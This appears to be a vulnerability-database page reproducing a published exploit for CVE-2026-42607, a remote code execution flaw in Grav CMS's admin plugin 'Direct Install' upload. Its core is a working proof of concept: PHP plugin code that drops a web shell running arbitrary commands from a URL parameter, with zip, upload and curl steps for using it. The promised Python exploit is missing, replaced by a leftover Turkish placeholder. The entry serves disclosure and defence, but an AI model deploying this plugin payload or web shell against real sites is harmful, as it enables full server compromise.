Vulners
Lucene search
π Grav CMS Shell Upload
ποΈΒ 29 May 2026Β 00:00:00Reported byΒ Mustafa Murat AkgΓΌlTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 52Β Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2026-42607 | 27 Apr 202612:14 | β | circl |
 | Grav 代η 注ε ₯ζΌζ΄ | 11 May 202600:00 | β | cnnvd |
 | CVE-2026-42607 | 11 May 202614:58 | β | cve |
 | CVE-2026-42607 Grav: Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 11 May 202614:58 | β | cvelist |
 | Grav CMS 2.0.0-beta.2 - Remote Code Execution | 26 May 202600:00 | β | exploitdb |
 | Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 202621:21 | β | github |
 | CVE-2026-42607 | 11 May 202616:17 | β | nvd |
 | GHSA-W48R-JPPP-RCFW Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 202621:21 | β | osv |
| π Grav CMS Remote Code Execution | 17 Jun 202600:00 | β | packetstorm |
| π Grav CMS Zip Slip Remote Code Execution | 18 Jun 202600:00 | β | packetstorm |
10
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE)
# Date: 2026-05-08
# Exploit Author: Mustafa Murat AkgΓΌl
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)
Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators
to upload plugins as ZIP files. The system failed to adequately validate the
contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction.
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized),
an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.
Proof of Concept (PoC):
1. Create a malicious plugin structure:
- shellplugin/blueprints.yaml
- shellplugin/shellplugin.yaml
- shellplugin/shellplugin.php (Payload below)
--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;
class ShellpluginPlugin extends Plugin {
public static function getSubscribedEvents(): array {
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}
public function onPluginsInitialized(): void {
$shell_path = GRAV_ROOT . '/shell.php';
if (!file_exists($shell_path)) {
file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
}
}
}
----------------------
2. Compress the directory:
$ zip -r shellplugin.zip shellplugin/
3. Log in to the Grav Admin panel and navigate to:
/admin/tools/direct-install
4. Upload the 'shellplugin.zip' file.
5. Once installed, the plugin triggers on the next request to the site,
dropping a shell at the root.
6. Access your shell:
curl "http://<target>/shell.php?cmd=id"
Exploit Script (Python):
[Buraya yukarΔ±da paylaΕtΔ±ΔΔ±n Python scriptini ekleyebilirsin]
Impact:
Full system-level access under the context of the web server user. An attacker
with administrative privileges (or via CSRF) can compromise the entire server.Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.1
EPSS0.03934
SSVC